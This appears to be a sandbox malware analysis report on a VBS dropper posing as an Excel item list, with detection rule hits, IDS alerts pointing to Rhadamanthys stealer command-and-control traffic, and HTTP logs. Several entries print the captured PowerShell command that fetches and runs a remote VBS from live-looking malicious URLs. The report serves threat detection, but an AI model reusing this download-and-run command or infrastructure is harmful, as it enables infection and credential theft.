                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 416, TargetFilename: C:\Users\Public\grm2bfvsa42.vbs
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ProcessId: 416, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49814, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8172, Protocol: tcp, SourceIp: 52.113.195.132, SourceIsIpv6: false, SourcePort: 443
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7660, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3992, ProcessName: svchost.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ProcessId: 416, ProcessName: powershell.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ProcessId: 4328, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx', ProcessId: 416, ProcessName: powershell.exe
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5944, ProcessName: svchost.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:38:44.942598+010020283713Unknown Traffic192.168.2.64981452.113.195.132443TCP
                        2024-12-05T10:39:47.871094+010020283713Unknown Traffic192.168.2.64996813.107.246.63443TCP
                        2024-12-05T10:40:00.907602+010020283713Unknown Traffic192.168.2.65001413.107.246.63443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:39:50.257552+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.649980TCP
                        2024-12-05T10:40:02.337124+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.650018TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:39:15.528705+010028032702Potentially Bad Traffic192.168.2.649887202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:38:03.559598+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.650042TCP
                        2024-12-05T10:39:25.515471+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.649912TCP
                        2024-12-05T10:39:50.257552+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.649980TCP
                        2024-12-05T10:40:02.337124+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.650018TCP
                        2024-12-05T10:40:11.994577+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.650041TCP
                        2024-12-05T10:40:21.691632+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.650043TCP
                        2024-12-05T10:40:28.853100+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.650044TCP
                        2024-12-05T10:40:36.015260+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.650046TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A960F0 CryptUnprotectData,25_3_00007DF415A960F0
                        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49718 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.6:49729 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.6:49748 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.6:49789 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.113.195.132:443 -> 192.168.2.6:49814 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49887 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49968 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50041 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50042 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50043 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50044 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.6:50046 version: TLS 1.2
                        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000010.00000002.2717791314.0000000008840000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2704378685.0000000007961000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 00000010.00000002.2717791314.0000000008840000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpnscfg.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A90B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,25_3_00007DF415A90B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp25_3_00007DF415AA1741
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp25_2_0000020D09DC0511
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 4x nop then dec esp32_2_0000024465415681

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.6:49912
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.6:49980
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.6:50018
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.6:50043
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.6:50046
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.6:50041
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.6:50044
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.6:50042
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Source: global trafficTCP traffic: 192.168.2.6:49912 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                        Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49814 -> 52.113.195.132:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49968 -> 13.107.246.63:443
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.6:49980
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 13.107.246.63:443
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.6:50018
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49887 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /ab/ab.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.pts.groupConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /ab/Laney.dsp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: pts.groupConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
